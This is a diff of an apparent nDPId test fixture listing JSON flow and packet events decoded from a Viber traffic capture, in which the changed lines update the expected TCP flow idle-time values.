-00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":264,"source":"viber.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1527155670663,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155670663,"pkt":"MAdNo1+nAA6OMNv9CABFAAA8AABAACsGeBoSyQQgwKgAEQG7sXDMrFlhkF0lOKASaN8nuwAAAgQFtAQCCAoAWtCxACF\/twEDAwc="} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":264,"source":"viber.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1527155670663,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155670663,"pkt":"MAdNo1+nAA6OMNv9CABFAAA8AABAACsGeBoSyQQgwKgAEQG7sXDMrFlhkF0lOKASaN8nuwAAAgQFtAQCCAoAWtCxACF\/twEDAwc="} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":265,"source":"viber.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1527155670672,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1527155670672,"pkt":"MAdNo1+nAA6OMNv9CABFAAAwfVFAACsR+skSyQQgwKgAER8zuEMAHAAy7fYaAKwZNYyPZORHMkN8XkO4AMg="} 00538{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":266,"source":"viber.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1527155670673,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":1527155670673,"pkt":"MAdNo1+nAA6OMNv9CABFAABofVBAACsR+pISyQQgwKgAER8xuEMAVGj37fYMAAEArBk1jI9k5EcyQ3xeQ7iuOZKRYwEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADIAAAAAAAAAAAAAAAAAAAAAA=="} 
-00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":267,"source":"viber.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1527155670673,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1527155670673,"pkt":"AA6OMNv9MAdNo1+nCABFAAA0WoFAAEAGCKHAqAAREskEILFwAbuQXSU4zKxZYoAQAq28sQAAAQEICgAhf78AWtCx"} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":269,"source":"viber.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155671066,"flow_last_seen":1527155671066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1527155671066,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.187.91.182","src_port":49048,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":269,"source":"viber.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1527155671066,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155671066,"pkt":"AA6OMNv9MAdNo1+nCABFAAA8FY9AAEAG0gLAqAARNrtbtr+YAbtog5WsAAAAAKAC\/\/+1DQAAAgQFtAQCCAoAIYAjAAAAAAEDAwc="} 
-00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":274,"source":"viber.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1527155671237,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155671237,"pkt":"MAdNo1+nAA6OMNv9CABFAAA8AABAAOYGQZE2u1u2wKgAEQG7v5iCE\/ghaIOVraASaN+HqAAAAgQFtAQCCAosBh44ACGAIwEDAwg="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":275,"source":"viber.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1527155671240,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1527155671240,"pkt":"AA6OMNv9MAdNo1+nCABFAAA0FZBAAEAG0gnAqAARNrtbtr+YAbtog5WtghP4IoAQAq0cfAAAAQEICgAhgE8sBh44"} -00852{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":276,"source":"viber.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1527155671066,"flow_last_seen":1527155671250,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":181,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1527155671250,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.187.91.182","src_port":49048,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"brahe.apptimize.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} 
-00909{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":278,"source":"viber.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155671066,"flow_last_seen":1527155671423,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1629,"flow_avg_l4_payload_len":271,"midstream":0,"thread_ts_msec":1527155671423,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.187.91.182","src_port":49048,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"brahe.apptimize.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} -01266{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":281,"source":"viber.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1527155671066,"flow_last_seen":1527155671423,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5054,"flow_avg_l4_payload_len":561,"midstream":0,"thread_ts_msec":1527155671423,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.187.91.182","src_port":49048,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"brahe.apptimize.com","server_names":"*.apptimize.com,apptimize.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Organization Validation Secure Server 
CA","subjectDN":"C=US, ST=CA, L=Mountain View, O=Apptimize, Inc, OU=PremiumSSL Wildcard, CN=*.apptimize.com","alpn":"http\/1.1","fingerprint":"BC:4C:8F:EC:8B:7B:85:BD:54:61:8B:C0:7B:E7:A2:69:0B:F2:49:E5"}} -00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":357,"source":"viber.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155679410,"flow_last_seen":1527155679410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1527155679410,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.3","src_port":33744,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":357,"source":"viber.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1527155679410,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155679410,"pkt":"AA6OMNv9MAdNo1+nCABFAAA8V2ZAAEAGC9HAqAAREskEA4PQAbvgGt8vAAAAAKAC\/\/+jOgAAAgQFtAQCCAoAIYhJAAAAAAEDAwc="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":267,"source":"viber.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1527155670673,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1527155670673,"pkt":"AA6OMNv9MAdNo1+nCABFAAA0WoFAAEAGCKHAqAAREskEILFwAbuQXSU4zKxZYoAQAq28sQAAAQEICgAhf78AWtCx"} 
+00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":269,"source":"viber.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155671066,"flow_last_seen":1527155671066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1527155671066,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.187.91.182","src_port":49048,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":269,"source":"viber.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1527155671066,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155671066,"pkt":"AA6OMNv9MAdNo1+nCABFAAA8FY9AAEAG0gLAqAARNrtbtr+YAbtog5WsAAAAAKAC\/\/+1DQAAAgQFtAQCCAoAIYAjAAAAAAEDAwc="} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":274,"source":"viber.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1527155671237,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155671237,"pkt":"MAdNo1+nAA6OMNv9CABFAAA8AABAAOYGQZE2u1u2wKgAEQG7v5iCE\/ghaIOVraASaN+HqAAAAgQFtAQCCAosBh44ACGAIwEDAwg="} 
+00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":275,"source":"viber.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1527155671240,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1527155671240,"pkt":"AA6OMNv9MAdNo1+nCABFAAA0FZBAAEAG0gnAqAARNrtbtr+YAbtog5WtghP4IoAQAq0cfAAAAQEICgAhgE8sBh44"} +00852{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":276,"source":"viber.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1527155671066,"flow_last_seen":1527155671250,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":181,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1527155671250,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.187.91.182","src_port":49048,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"brahe.apptimize.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} +00909{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":278,"source":"viber.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155671066,"flow_last_seen":1527155671423,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1629,"flow_avg_l4_payload_len":271,"midstream":0,"thread_ts_msec":1527155671423,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.187.91.182","src_port":49048,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"brahe.apptimize.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} +01266{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":281,"source":"viber.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1527155671066,"flow_last_seen":1527155671423,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5054,"flow_avg_l4_payload_len":561,"midstream":0,"thread_ts_msec":1527155671423,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.187.91.182","src_port":49048,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"brahe.apptimize.com","server_names":"*.apptimize.com,apptimize.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Organization Validation Secure Server CA","subjectDN":"C=US, ST=CA, L=Mountain View, O=Apptimize, Inc, OU=PremiumSSL Wildcard, CN=*.apptimize.com","alpn":"http\/1.1","fingerprint":"BC:4C:8F:EC:8B:7B:85:BD:54:61:8B:C0:7B:E7:A2:69:0B:F2:49:E5"}} 
+00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":357,"source":"viber.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155679410,"flow_last_seen":1527155679410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1527155679410,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.3","src_port":33744,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":357,"source":"viber.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1527155679410,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155679410,"pkt":"AA6OMNv9MAdNo1+nCABFAAA8V2ZAAEAGC9HAqAAREskEA4PQAbvgGt8vAAAAAKAC\/\/+jOgAAAgQFtAQCCAoAIYhJAAAAAAEDAwc="} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":358,"source":"viber.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155679411,"flow_last_seen":1527155679411,"flow_idle_time":180000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":257,"midstream":0,"thread_ts_msec":1527155679411,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.3","src_port":38190,"dst_port":7985,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00783{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":358,"source":"viber.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1527155679411,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":299,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":299,"pkt_l4_len":265,"thread_ts_msec":1527155679411,"pkt":"AA6OMNv9MAdNo1+nCABFiAEdf+NAAEAR4d\/AqAAREskEA5UuHzEBCY\/LBbgBAAUANRj1GJhk5EcHridUEQCowC6VMgAAAEMBABABAPdbkpFjAQAAAAAAACXfTU7hzTcbXJq8JtnTC0sBuzmzAAAAAAAAAAADAAEAZgIAZwABeAAAAAAAAIAAGwkdkSv31AWZshbdezAt4SmQgEbXQ8gpESKVZEPm+yytcfHi3zlsEfu0kKTP5bAY2qxB7\/oc6uBQ0Wmie0yDB6SNCb6pEPHTLEjikG3nU2iKPCm3mBiaaSkNyyVaokw3bFWKZLztddqHjISoa\/0AQVn24h8Bz7MKBuS1UkASdYsAAAAAAAAAAEcFAAA4AAAAEABBbmRyb2lkLDguOS4wLjIAAAA="} 00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":358,"source":"viber.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155679411,"flow_last_seen":1527155679411,"flow_idle_time":180000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":257,"midstream":0,"thread_ts_msec":1527155679411,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.3","src_port":38190,"dst_port":7985,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} 
@@ -122,8 +122,8 @@ 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":360,"source":"viber.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1527155679413,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1527155679413,"pkt":"AA6OMNv9MAdNo1+nCABFiAAuf+VAAEAR4szAqAAREskEA5UuHzEAGscOBbgRAAEAAAAuCDgEAAAHridU"} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":361,"source":"viber.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1527155679413,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1527155679413,"pkt":"AA6OMNv9MAdNo1+nCABFiAAwf+ZAAEAR4snAqAAREskEA5UuHzEAHM1MBbgJAPtbkpFjAQAANRj1GJhk5Ec="} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":363,"source":"viber.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1527155679443,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1527155679443,"pkt":"MAdNo1+nAA6OMNv9CABFAAAwpnZAACsR0cESyQQDwKgAER8zlS4AHM86BbgaADUY9RiYZORHMkN8Xi6VAMg="} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":364,"source":"viber.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1527155679443,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155679443,"pkt":"MAdNo1+nAA6OMNv9CABFAAA8AABAACsGeDcSyQQDwKgAEQG7g9B0pK754BrfMKASaN\/EGgAAAgQFtAQCCAoA5FGtACGISQEDAwc="} 
-00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":365,"source":"viber.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1527155679444,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1527155679444,"pkt":"AA6OMNv9MAdNo1+nCABFAAA0V2dAAEAGC9jAqAAREskEA4PQAbvgGt8wdKSu+oAQAq1ZEAAAAQEICgAhiFIA5FGt"} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":364,"source":"viber.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1527155679443,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155679443,"pkt":"MAdNo1+nAA6OMNv9CABFAAA8AABAACsGeDcSyQQDwKgAEQG7g9B0pK754BrfMKASaN\/EGgAAAgQFtAQCCAoA5FGtACGISQEDAwc="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":365,"source":"viber.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1527155679444,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1527155679444,"pkt":"AA6OMNv9MAdNo1+nCABFAAA0V2dAAEAGC9jAqAAREskEA4PQAbvgGt8wdKSu+oAQAq1ZEAAAAQEICgAhiFIA5FGt"} 
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":421,"source":"viber.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155685529,"flow_last_seen":1527155685529,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1527155685529,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":50097,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":421,"source":"viber.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1527155685529,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155685529,"pkt":"AA6OMNv9MAdNo1+nCABFAAA8KqJAAEARjp7AqAARwKgAD8OxADUAKKNciEIBAAABAAAAAAAAA3d3dwZnb29nbGUDY29tAAABAAE="} 00768{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":421,"source":"viber.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155685529,"flow_last_seen":1527155685529,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1527155685529,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":50097,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
@@ -133,34 +133,34 @@ 02402{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":423,"source":"viber.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1527155685757,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":1527155685757,"pkt":"AA6OMNv9MAdNo1+nCABFAAXcfu9AAEABNMHAqAARwKgADwgA3UOrGAABMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVV